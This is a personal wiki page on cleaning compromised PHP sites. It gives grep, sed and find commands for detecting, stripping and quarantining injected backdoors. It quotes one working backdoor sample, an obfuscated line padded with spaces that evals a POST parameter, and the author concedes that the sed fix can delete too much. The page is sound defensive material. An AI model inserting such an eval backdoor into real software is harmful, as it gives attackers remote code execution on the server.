PHP Hack Fix: Difference between revisions

From Leo's Notes
This page was last edited on 27 December 2014, at 03:02.
No edit summary
No edit summary
Line 41: Line 41:


=== Quarantine ===
=== Quarantine ===
  find -type f -size XXXXc -iname \*.php -exec  ls {} \; | while read i ; do Name=`echo $i|sed 's/\//-/g'|sed 's/\.^C/g'` ; mv -v $i ~/abuse/username/$Name ; done
<syntaxhighlight lang="bash"  enclose="div">
find -type f -size XXXXc -iname \*.php -exec  ls {} \; | while read i ; do Name=`echo $i|sed 's/\//-/g'|sed 's/\//-/g'|sed 's/\.-//g'` ; mv -v $i ~/abuse/username/$Name ; done
</syntaxhighlight>


[[Category:Coding]]
[[Category:Coding]]

Revision as of 03:02, 27 December 2014

Typically, these PHP hacks are uploaded remotely through an already opened exploit such as an old install of WordPress. Remote exploits allow for arbitrary code execution which can do various things including adding backdoors to all .php files it encounters or by uploading a payload to the server to spam.

This page will contain the methods used to detect and remove these scripts.

Searching By String

The simplest backdoor which gets injected to the first line of a .php file looks similar to the following. The code does not end with a newline, which means that the beginning of the original file will begin immediately after the ?>.

<?php                                                                                                                                                                                                                                                               $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q945107'])){eval(${$s20}['q945107']);}?>

The code is prefixed by 255 spaces, probably to hide the exploit if line wrapping is disabled. This makes it quite easy to search for this exploit through a simple grep:

  grep -iRl --include \*.php 'php                                                       ' *

To fix the file, uses the following sed command which will delete everything until the first ?> string.

  sed '1s/^.*?>//'

Warning: The above will nuke everything until the last ?> - If you know how to make it so it deletes everything up till the first one, update me!

You can then string up the commands to mass-fix exploited files:

 grep -iRl --include \*.php 'php                                                       ' * | while read i ; do echo $i ; head -n 1 $i | grep -oH strtoupper && head -n 1 $i &&  sed '1s/^.*?>//' -i $i ; done

Because the script randomizes its strings and variables used, grepping for a specific string is not as reliable.


Searching By Size

Since hackers upload the same exploits in multiple places, it's a good idea to keep copies of any found exploits and then search the compromised account for files of the same size.

A backdoor which I found was 510 bytes in size. Running the following command turned up more of the same exploits.

 find -type f -size 510c -iname \*.php -exec  ls {} \;

A spammer I found had a size of 64680 and later 64690.

 find -type f -size 64680c -iname \*.php -exec  ls {} \;
 find -type f -size 64690c -iname \*.php -exec  ls {} \;


Quarantine

find -type f -size XXXXc -iname \*.php -exec  ls {} \; | while read i ; do Name=`echo $i|sed 's/\//-/g'|sed 's/\//-/g'|sed 's/\.-//g'` ; mv -v $i ~/abuse/username/$Name ; done